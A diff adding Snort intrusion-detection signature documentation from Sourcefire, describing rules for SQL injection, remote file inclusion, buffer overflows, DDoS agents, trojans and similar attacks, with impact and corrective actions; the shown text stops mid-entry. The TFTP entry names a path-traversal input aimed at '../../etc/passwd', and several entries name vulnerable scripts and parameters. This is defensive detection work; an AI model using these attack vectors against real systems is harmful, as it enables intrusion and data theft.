+CVE Entry
+CAN-2003-0015
+
+--
--- /dev/null
+++ b/doc/signatures/100000710.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000710
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection vulnerability in the "Xoops MyAds Module" application running on a webserver. Access to the file "annonces-p-f.php" with SQL commands being passed as the "lid" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a remote machine via the "lid" parameter in the "annonces-p-f.php" script used by the "Xoops MyAds Module" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to compromise the database backend for the application, the attacker may also be able to execute system binaries or malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Xoops MyAds Module
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application if user input is not correctly sanitized or checked before passing that input to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
--- /dev/null
+++ b/doc/signatures/3074.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+3074
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer
+overflow associated with the several commands of an IMAP service. This
+event is concerned with data supplied as a parameter to the
+"subscribe" command.
+
+--
+Impact:
+A successful attack may cause a denial of service or a buffer overflow
+and the subsequent execution of arbitrary code on a vulnerable server.
+
+--
+Detailed Information:
+This event is generated when excess data is detected in an IMAP command.
+Some IMAP implementations exhibit programming errors that can lead to a
+buffer overflow condition when excess data is supplied to a static
+buffer.
+
+A vulnerability exists in the way that the Mercury Mail IMAP service
+handles several commands.  An excessively long command argument can
+trigger a denial of service or a buffer overflow and the subsequent
+execution of arbitrary code on a vulnerable server.
+
+--
+Affected Systems:
+	Pegasus Mail Mercury Mail Transport System 3.32
+	Pegasus Mail Mercury Mail Transport System 4.01a
+
+--
+Attack Scenarios:
+An attacker can supplied an overly long command, causing denial of
+service or a buffer overflow.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell<bmc@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2897.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2897
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure drop_site_priority
+. This procedure is included in
+sys.dbms_repcat_conf.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2575.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+2575
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a PHP web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a PHP application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the PHP application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running PHP applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying PHP script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3179.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3179
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1922.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid:
+1922
+
+--
+Summary:
+This event is generated when an attempt is made to forward a Remote Procedure Call (RPC) request through the portmapper service.
+
+--
+Impact:
+Information disclosure.  This can detect and request RPC services offered.
+
+--
+Detailed Information:
+The RPC "callit" procedure allows the portmapper to act as a proxy to forward requests to other RPC services offered by the host. This allows an attacker to call an RPC service on the same host without knowing the port number associated with the RPC service.    
+
+--
+Affected Systems:
+All hosts running portmapper.
+
+--
+Attack Scenarios:
+An attacker can use the portmapper proxy to circumvent any required authentication when sending requests to the actual port associated with an RPC service.
+
+--
+Ease of Attack:
+Simple. 
+
+--
+False Positives:
+According to RFC 1057, this proxy feature supports broadcasts to RPC services using the well-known portmapper port.  Legitimate hosts may attempt to use the proxy feature.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines.
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Original rule writer unknown
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+RFC:
+http://www.ietf.org/rfc/rfc1057.txt
+
+
+--
--- /dev/null
+++ b/doc/signatures/454.txt
@@ -0,0 +1,57 @@
+Rule:
+
+--
+Sid:
+454
+
+--
+Summary:
+This event is generated when an ICMP Timestamp request is made with an invalid or undefined ICMP Code.
+
+--
+Impact:
+Information gathering.  An ICMP Timestamp request can determine if a host is active.
+
+--
+Detailed Information:
+An ICMP Timestamp request is used by the ping command to elicit an ICMP Timestamp reply from a listening live host.  This rule alerts on a generic ICMP request where no payload is included in the message or the payload does not match more specific rules. 
+
+If ICMP type 8 (echo) traffic is filtered at a firewall, an attacker may try to use type 13 (timestamp) as an alternative.
+
+--
+Affected Systems:
+All
+
+--
+Attack Scenarios:
+An attacker may attempt to determine live hosts in a network prior to launching an attack.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+An ICMP Timestamp request may be used to legitimately troubleshoot networking problems.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Block inbound ICMP Timestamp requests.
+
+--
+Contributors:
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+Additional information by Steven Alexander<alexander.s@mccd.edu>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/2162.txt
@@ -0,0 +1,59 @@
+Rule:
+
+--
+Sid:
+2162
+
+
+--
+Summary:
+This event is generated when a possible outgoing virus is detected. 
+
+--
+Impact:
+Informational event. An virus on an infected host may be attempting to 
+propogate.
+
+--
+Detailed Information:
+This event indicates that an outgoing email message possibly containing 
+a virus has been detected.
+
+This rule generates an event when a filename extension commonly used by 
+viruses is detected.
+
+--
+Affected Systems:
+Any host.
+
+--
+Attack Scenarios:
+This is indicative of a virus infection.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+A legitimate attachment to an email may generate this event.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the host for signs of virus infection.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/261.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+260
+
+--
+Summary:
+This event is generated by an attempted buffer overflow associated with incorrect validation of NXT records.
+
+--
+Impact:
+Severe. The DNS server can be compromised allowing the attacker access with the privileges of the user running BIND.  This attack is sometimes referred to as ADMROCKS because a subdirectory named ADMROCKS is placed in the directory associated with BIND software. 
+
+--
+Detailed Information:
+Improper validation of DNS NXT records may allow an attacker to perform a buffer overflow.  This can allow execution of arbitrary code with the privileges of the user running BIND.
+
+--
+Affected Systems:
+BIND versions 8.2 up to, but not including, 8.2.2.
+
+--
+Attack Scenarios:
+An attacker can launch this exploit to gain remote access to the DNS server.
+
+--
+Ease of Attack:
+Simple.  Code exists to exploit the buffer overflow.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade to a version of BIND 8.2.2, or greater or patch vulnerable versions of BIND.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CERT:
+http://www.cert.org/advisories/CA-1999-14.html
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0833
+
+Bugtraq:
+http://www.securityfocus.com/bid/788
+
+
+--
--- /dev/null
+++ b/doc/signatures/100000764.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000764
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "MyPHP CMS" application running on a webserver. Access to the file "global_header.php" using a remote file being passed as the "domain" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "domain" parameter in the "global_header.php" script used by the "MyPHP CMS" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using MyPHP CMS
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/1854.txt
@@ -0,0 +1,65 @@
+Rule:
+
+--
+Sid:
+1854
+
+--
+Summary:
+This event is generated when activity indicating the presence of a
+variant of the Stacheldraht DDOS tool is detected.
+
+--
+Impact:
+Distributed Denial of Service (DDoS) is possible.
+
+--
+Detailed Information:
+Stracheldraht is a Distributed denial of service tool normally found on
+Sun Solaris machines. It is made up of a Client, handler and agent. The
+clients connects to the handler. Handlers can connect with up to 1000
+agents. Communication between the client and the handler is conducted
+using tcp and the communication between the handler and the agent can be
+either tcp or icmp_echoreply. This rule detects the message sent from
+the handler to the agent. This traffic differs from the traffic described on
+http://staff.washington.edu/dittrich/misc/stacheldraht.analysis because the
+packets have an icmp id of 9015 rather than 1000 as noted in the analysis.
+
+--
+Affected Systems:
+	Sun Solaris
+
+--
+Attack Scenarios:
+The agent can be used to mount a distributed denial of service attack. It
+also indicates that a machine is compromised.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+The icmp id along with the keywords may be changed in the
+source code which would then evade this rule.
+
+--
+Corrective Action:
+Disconnect power from the machine and perform forensic analysis on the
+hard drives.
+
+--
+Contributors:
+Snort documentation contributed by Ian Macdonald
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3374.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3374
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000119.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+100000119
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a buffer overflow 
+present in Internet Explorer's urlmon.dll file.
+
+-- 
+
+Impact: 
+An attacker may execute arbitrary commands with the privileges of the user 
+running Internet Explorer.
+
+--
+Detailed Information:
+If a web server sends data with a Content-Encoding value of 300 or more bytes, 
+a buffer overflow is triggered, and commands may be executed with the 
+privileges of the user running Internet Explorer.
+
+--
+Affected Systems:
+Internet Explorer 5.0.1
+Internet Explorer 5.0.1 SP1
+Internet Explorer 5.0.1 SP2
+Internet Explorer 5.0.1 SP3
+Internet Explorer 5.5
+Internet Explorer 5.5 SP1
+Internet Explorer 5.5 SP2
+Internet Explorer 6.0
+Internet Explorer 6.0 SP1
+
+--
+
+Attack Scenarios: 
+An attacker must entice a user to click on a link to a properly configured 
+server, which will return the necessary data.
+
+-- 
+
+Ease of Attack: 
+Simple. An attacker must control a properly configured web server, and entice 
+users to click on a link to that server.
+
+-- 
+
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+-- 
+
+Corrective Action: 
+Apply the latest patches for Internet Explorer from Microsoft.com.
+
+--
+Contributors: 
+Alex Kirk <alex.kirk@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/215.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid:
+215
+
+--
+Summary:
+This event is generated when  an attacker attempts to connect to a 
+Telnet server using the phrase "d13hh[".
+
+--
+Impact:
+Possible theft of data and control of the targeted machine leading to a
+compromise of all resources the machine is connected to.
+
+--
+Detailed Information:
+This Trojan affects Linux operating systems:
+
+Due to the nature of this Trojan it is unlikely that the attacker's 
+client IP address has been spoofed.
+
+--
+Attack Scenarios:
+This Trojan may be delivered to the target in a number of ways. This
+event is indicative of an existing infection being activated. Initial
+compromise may be due to the exploitation of another vulnerability and 
+the attacker is leaving another way into the machine for further use.
+
+--
+Ease of Attack:
+This is Trojan activity, the target machine may already be compromised.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow Telnet access from external sources.
+
+Use SSH as opposed to Telnet for access from external locations
+
+Delete the Trojan and kill any associated processes.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/2579.txt
@@ -0,0 +1,65 @@
+Rule:
+
+--
+Sid:
+2579
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a heap overflow
+associated with Kerberos V5.
+
+--
+Impact:
+A successful attack may cause a heap overflow, permitting the execution of
+arbitrary code.
+
+--
+Detailed Information:
+When Kerberos V5 uses a non-default configuration of enabling rules-based
+mapping, it is possible to cause a heap overflow and the subsequent
+execution of arbitrary code on the vulnerable host.  The attacker has
+to successfully authenticate in order to exploit the vulnerability.
+If an attacker supplies an overly long principal name, it may be possible
+to cause a heap overflow on the vulnerable Kerberos-enabled server.
+
+--
+Affected Systems:
+MIT Kerberos V5 including krb5-1.3.3
+
+--
+Attack Scenarios:
+An attacker authenticates to the Kerberos server and later supplies
+an overly long principle name when attempting to connect to a server
+that employs Kerberos authentication. This can cause a heap overflow
+and subsequent execution of code on a vulnerable server.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+Dan Roelker <dan.roelker@sourcefire.com>
+
+--
+Additional References
+
+Other:
+http://web.mit.edu/kerberos/advisories/MITKRB5-SA-2004-001-an_to_ln.txt
+
+--
--- /dev/null
+++ b/doc/signatures/3095.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+3095
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft License Logging Service.
+
+-- 
+Impact: 
+Serious. Execution of arbitrary code leading to unauthorized
+administrative access to the target host. Denial of Service (DoS) is
+also possible.
+
+--
+Detailed Information:
+Microsoft License Logging Service is used to manage licenses for
+Microsoft server products.
+
+A vulnerability in the service exists due to a programming error such
+that an unchecked buffer may present an attacker with the opportunity to
+exploit the service and run code of their choosing on an affected
+system. The attacker may then cause a DoS condition in the service or
+possibly gain administrative access to the target host.
+
+The unchecked buffer exists when processing the length of messages sent
+to the logging service.
+
+--
+Affected Systems:
+	Microsoft Windows Server 2003
+	Microsoft Windows Server 2000
+	Microsoft Windows NT Server
+
+--
+Attack Scenarios: 
+An attacker can supply extra data in the message to the service
+containing code of their choosing to be run on the server.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+-- 
+
+Corrective Action: 
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000538.txt
@@ -0,0 +1,75 @@
+Rule:
+
+--
+Sid:
+100000538
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection 
+vulnerability in the "thinkWMS" application running on a webserver. Access to 
+the file "index.php" with SQL commands being passed as the "catid" parameter 
+may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a 
+remote machine via the "catid" parameter in the "index.php" script used by the 
+"thinkWMS" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to compromise the database backend for the 
+application, the attacker may also be able to execute system binaries or 
+malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using thinkWMS
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application 
+if user input is not correctly sanitized or checked before passing that input 
+to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
--- /dev/null
+++ b/doc/signatures/426.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+
+Sid:
+426
+
+--
+
+Summary:
+This event is generated when a router generates and ICMP Parameter Problem Required Option Missing datagram.
+
+--
+
+Impact:
+This could be an indication of a protocol error by a previous hop router.  Normally this datagram would only be generated when the IP datagram is truncated or damaged before it reaches its final destination.
+
+--
+
+Detailed Information:
+A router generates a Parameter Problem message for any error not specifically covered by another ICMP message.  An ICMP Parameter Problem Required Option Missing datagram indicates that the IP datagram is invalid or contains invalid IP options.  This could be an indication of routing problems on the network, or malfunctioning routing hardware.
+
+--
+
+Attack Scenarios:
+None known
+
+--
+
+Ease of Attack:
+Numerous tools and scripts can generate this type of ICMP datagram.
+
+--
+
+False Positives:
+None known
+
+--
+
+False Negatives:
+None known
+
+--
+
+Corrective Action:
+ICMP Type 12 Code 1 datagrams are not normal network activity.  Hosts generating these types of datagrams should be investigated for configuration errors or nefarious activity.
+
+--
+
+Contributors:
+Original Rule writer unknown
+Sourcefire Research Team
+Matthew Watchinski (matt.watchinski@sourcefire.com)
+
+--
+
+Additional References:
+None
+
+
+--
--- /dev/null
+++ b/doc/signatures/519.txt
@@ -0,0 +1,54 @@
+Rule:
+
+--
+Sid:
+519
+
+--
+Summary:
+This event is generated when a TFTP request is made with a parent directory designation of "..".  This may be an indication of an attempt to request or place files on the TFTP server outside the root directory configured for the TFTP server.
+
+--
+Impact:
+TFTP servers that allow files to be placed outside the configured root directory for the server may allow remote attackers to execute arbitrary commands on the system.  Additionally if the TFTP server allows directory transversal using the ".." designator it may be possible to retrieve files from other directories on the system.
+
+--
+Detailed Information:
+This rule searches for ".." payload in TFTP requests.  Vulnerable TFTP servers may allow remote attackers to transfer files to directories outside the normal root directory configured for the TFTP server.  This could result in sensitive files being transfered off the system or arbitrary files being upload to the system.
+
+--
+Attack Scenarios:
+Using the ".." designator it may be possible to fool vulnerable TFTP server into placing files or retrieving files from outside the TFTP configured root directory.  Normally an attacker will attempt to retrieve sensitive system files such as "../../etc/passwd" or "../../shadow" after determining if this attack vector is successful.  
+
+--
+Ease of Attack:
+Simple: Numerous tools and automated scripts exist for scanning large subnets for improperly configured TFTP servers.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives
+None Known
+
+--
+Corrective Action:
+Upgrade to the current version of your TFTP server solutation, or contact the product vendor for patch information.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Matthew Watchinski Matt.Watchinski@sourcefire.com
+
+--
+Additional References
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0183
+
+Arachnids:
+http://www.whitehats.com/info/IDS137
+
+--
--- /dev/null
+++ b/doc/signatures/2976.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+533
+
+--
+Summary:
+This event is generated when an attempt is made to access the C$ default
+administrative share of a Windows host.
+
+--
+Impact:
+Serious. Possible administrator access to the host. Information 
+disclosure.
+
+--
+Detailed Information:
+By default, Windows hosts have default administrative shares of the 
+local hard drives using the format %DRIVE_LETTER% + $. Anybody with 
+administrative rights can remotely access the share.
+
+--
+Affected Systems:
+	Windows hosts.
+
+--
+Attack Scenarios:
+An attacker may be attempting to access files located on the C drive of 
+the host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow Netbios access from external networks (tcp port 139).
+
+--
+Contributors:
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Josh Sakofsky
+
+-- 
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS339
+
+Microsoft:
+http://support.microsoft.com/default.aspx?scid=kb;en-us;100517
+
+--
--- /dev/null
+++ b/doc/signatures/100000831.txt
@@ -0,0 +1,56 @@
+
+
+Rule:
+
+--
+Sid:
+100000831
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site scripting vulnerability in the "HiveMail" application running on a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site scripting vulnerability via the "data[to]" parameter in the "compose.email.php" script used by the "HiveMail" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to retrieve sensitive data, execute system binaries or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using HiveMail
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
--- /dev/null
+++ b/doc/signatures/1487.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+1487
+
+
+--
+Summary:
+This event is generated when an attempt is made to request an HTTP-based password change.
+
+--
+Impact:
+Information gathering/remote access.  Error messages from failed password changes can indicate whether a given account exists on the server.  Successful password changes can allow remote access to the server. 
+
+--
+Detailed Information:
+Microsoft Internet Information Services (IIS) Version 4 supplies a feature to allow users to make remote password changes.  The iisadmpwd directory has several .HTR files that are used to implement the password changes.  An attacker can request a change and use a returned form to supply an account name, existing password, and new password either to brute force changes or discover whether a specific account name exist. 
+
+--
+Affected Systems:
+
+Microsoft IIS 4.0
+
+--
+Attack Scenarios:
+An attacker can request password changes to discover existing accounts or brute force password changes.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
